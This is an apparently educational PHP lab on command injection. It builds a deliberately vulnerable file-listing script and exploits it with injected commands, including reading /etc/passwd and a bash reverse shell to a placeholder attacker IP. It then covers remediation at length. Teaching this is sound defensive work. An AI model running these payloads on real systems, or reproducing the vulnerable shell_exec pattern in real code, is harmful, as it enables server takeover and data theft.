Exercise 33: Insufficient Input Validation (Command Line Arguments)

Apr 6, 2025

Objective

Learn how to exploit Insufficient Input Validation vulnerabilities when user input is passed directly as command-line arguments to a web server or application. Understand how to prevent such vulnerabilities through secure input validation and avoiding direct execution of user inputs.


Scenario

You are assessing a web application that accepts user input and passes it directly to a shell command without proper validation. This oversight allows attackers to inject malicious commands, potentially leading to Remote Code Execution (RCE).


Lab Setup

Prerequisites:

  • Basic knowledge of PHP and Linux command-line operations.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

  1. PHP Script with Command Execution Vulnerability
    • Create a file files.php (deliberately vulnerable: the filename parameter is concatenated straight into a shell command line):

        <?php
        if (isset($_GET['filename'])) {
            $filename = $_GET['filename'];
            // Unvalidated user input becomes part of the command string
            $output = shell_exec("ls -l " . $filename);
            echo "<pre>$output</pre>";
        } else {
            echo "<h2>Please provide a filename.</h2>";
        }
        ?>
        <h2>File Listing Tool</h2>
        <form method="GET" action="">
            Filename: <input type="text" name="filename" required><br>
            <button type="submit">List File</button>
        </form>
  2. Running the Application
    • Start the Apache server.
    • Place files.php in the web server’s root directory (htdocs for XAMPP).
    • Open http://localhost/files.php in your browser.

Exploitation Steps

Step 1: Injecting Arbitrary Commands

  1. In the Filename field, enter the following payload: ; whoami
  2. Expected Result:
    • The output displays the user under which the web server is running (e.g., www-data or apache).

Step 2: Reading Sensitive Files

  1. Enter the payload: ; cat /etc/passwd
  2. Expected Result:
    • The server displays the contents of /etc/passwd, exposing sensitive system information.

Step 3: Establishing a Reverse Shell (Advanced)

  1. Input a reverse shell payload (replace ATTACKER_IP and PORT): ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
  2. Expected Result:
    • The attacker gains shell access to the server.

Solution and Prevention

Problem Analysis

  • User input is passed directly to the shell command without validation, enabling command injection.

Fixing the Vulnerability

  1. Sanitize User Input
    • Use escapeshellarg() so the value reaches the shell as one single-quoted argument that cannot terminate the command or start another one:

        $filename = escapeshellarg($_GET['filename']);
        $output = shell_exec("ls -l " . $filename);
        // Encode the command output before placing it in HTML
        echo "<pre>" . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . "</pre>";

      Note that escapeshellarg() only stops the argument from breaking out of the command; ls still receives whatever path the user typed, so combine it with a path restriction (step 3) or, better, drop the shell entirely (step 2).
  2. Avoid Direct Shell Execution
    • Replace shell commands with built-in functions, so no command string exists for an attacker to break out of:

        $filename = $_GET['filename'];
        if (file_exists($filename)) {
            // Encode the reflected name so the response cannot be used for HTML injection
            echo "<h2>File exists: " . htmlspecialchars($filename, ENT_QUOTES, 'UTF-8') . "</h2>";
        } else {
            echo "<h2>File not found.</h2>";
        }

      On its own, file_exists() on an unrestricted path still lets a caller probe whether arbitrary files exist on the system; restrict the lookup to a known base directory (for example with basename() or a realpath() prefix check) as well.
  3. Whitelist Valid Inputs
    • Allow only specific filenames or directories. Pass true as the third argument to in_array() so the comparison is strict and a non-string value cannot match through type juggling:

        $allowed_files = ['file1.txt', 'file2.txt'];
        if (in_array($_GET['filename'], $allowed_files, true)) {
            $filename = escapeshellarg($_GET['filename']);
            $output = shell_exec("ls -l " . $filename);
            echo "<pre>" . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . "</pre>";
        } else {
            echo "<h2>Invalid file request.</h2>";
        }
  4. Use Least Privilege Principle
    • Run the web server with the least privileges to minimize the impact of exploitation.
  5. Disable Dangerous PHP Functions
    • Disable shell_exec, exec, and related functions in php.ini (the directive takes effect after PHP or the web server is restarted; popen and proc_open also spawn processes and are worth adding to the list):

        disable_functions = shell_exec, exec, system, passthru

Testing After Fix

  1. Attempt to inject ; whoami into the filename field.
  2. Expected Result:
    • The input is either sanitized or blocked, and no command execution occurs.
  3. Attempt to input ; cat /etc/passwd.
  4. Expected Result:
    • The server rejects the input or returns a safe error message.
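The following is a complete hardened files.php that combines steps 2 and 3 of the fix with the checks from Testing After Fix. It is an added example, not the lab's own code: it assumes a base directory /var/www/files that the tool may inspect, rejects any name that fails a strict allowlist pattern before touching the filesystem, canonicalizes with realpath() so traversal and symlink escapes cannot leave the base directory, and builds the listing with stat() instead of ls -l so there is no shell command at all. The function names and the directory are this example's own choices. Run it from the command line (php files.php) to see the lab's two payloads rejected by the validator; served through the web server it behaves like the original tool.

```php
<?php
// Added example, not the lab's original files.php.
// Assumption: BASE_DIR is the only directory the tool is allowed to inspect.
declare(strict_types=1);

const BASE_DIR = '/var/www/files';

/**
 * Syntactic allowlist: a plain file name (no separators, no shell metacharacters,
 * no leading dot), checked before anything touches the filesystem.
 */
function is_safe_name(string $input): bool
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,254}\z/', $input) === 1;
}

/**
 * Resolve a validated name to an absolute path and confirm it is still inside
 * BASE_DIR after canonicalization (catches symlinks that point elsewhere).
 * Returns null when the input is rejected or the file does not exist.
 * str_starts_with() requires PHP 8.
 */
function resolve_in_base(string $input): ?string
{
    if (!is_safe_name($input)) {
        return null;
    }
    $base = realpath(BASE_DIR);
    $path = realpath(BASE_DIR . DIRECTORY_SEPARATOR . $input);
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

/**
 * Produce an ls -l style line with built-in functions only; no command string
 * exists for an attacker to break out of.
 */
function describe_file(string $path): string
{
    $st = stat($path);
    if ($st === false) {
        return 'File not found.';
    }
    $perms = substr(sprintf('%o', $st['mode']), -4);   // permission bits of st_mode
    $mtime = date('Y-m-d H:i', $st['mtime']);
    return sprintf('%s %d %s %s', $perms, $st['size'], $mtime, basename($path));
}

/**
 * Self-check mirroring "Testing After Fix": maps each input to whether the
 * syntactic validator accepts it. The lab's payloads must all come back false;
 * only the plain file name is accepted.
 */
function run_checks(): array
{
    $inputs = ['; whoami', '; cat /etc/passwd', '../report.txt', 'report.txt'];
    $results = [];
    foreach ($inputs as $input) {
        $results[$input] = is_safe_name($input);
    }
    return $results;
}

if (PHP_SAPI === 'cli') {
    foreach (run_checks() as $input => $accepted) {
        printf("%-22s => %s\n", var_export($input, true), $accepted ? 'accepted' : 'rejected');
    }
    exit(0);
}

// Web entry point: validate first, then render with output encoding so the
// response never reflects raw user input into HTML.
if (isset($_GET['filename']) && is_string($_GET['filename'])) {
    $path = resolve_in_base($_GET['filename']);
    if ($path === null) {
        http_response_code(400);
        echo '<h2>Invalid file request.</h2>';
    } else {
        echo '<pre>' . htmlspecialchars(describe_file($path), ENT_QUOTES, 'UTF-8') . '</pre>';
    }
} else {
    echo '<h2>Please provide a filename.</h2>';
}
?>
<h2>File Listing Tool</h2>
<form method="GET" action="">
  Filename: <input type="text" name="filename" required><br>
  <button type="submit">List File</button>
</form>
```

The two layers are deliberate: is_safe_name() rejects the command-injection payloads from a fixed pattern before any filesystem call, and resolve_in_base() guards against the remaining path-level risk (a name that is syntactically clean but resolves outside the directory through a symlink). Because the error branch returns the same generic message whether the name was malformed or the file is simply absent, the tool does not double as an existence oracle for files outside BASE_DIR.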

Conclusion

In this lab, you exploited Insufficient Input Validation by injecting commands through unsanitized input, gaining access to sensitive information. You also learned how to mitigate these risks by sanitizing input, avoiding direct shell execution, implementing input whitelisting, and applying the principle of least privilege.
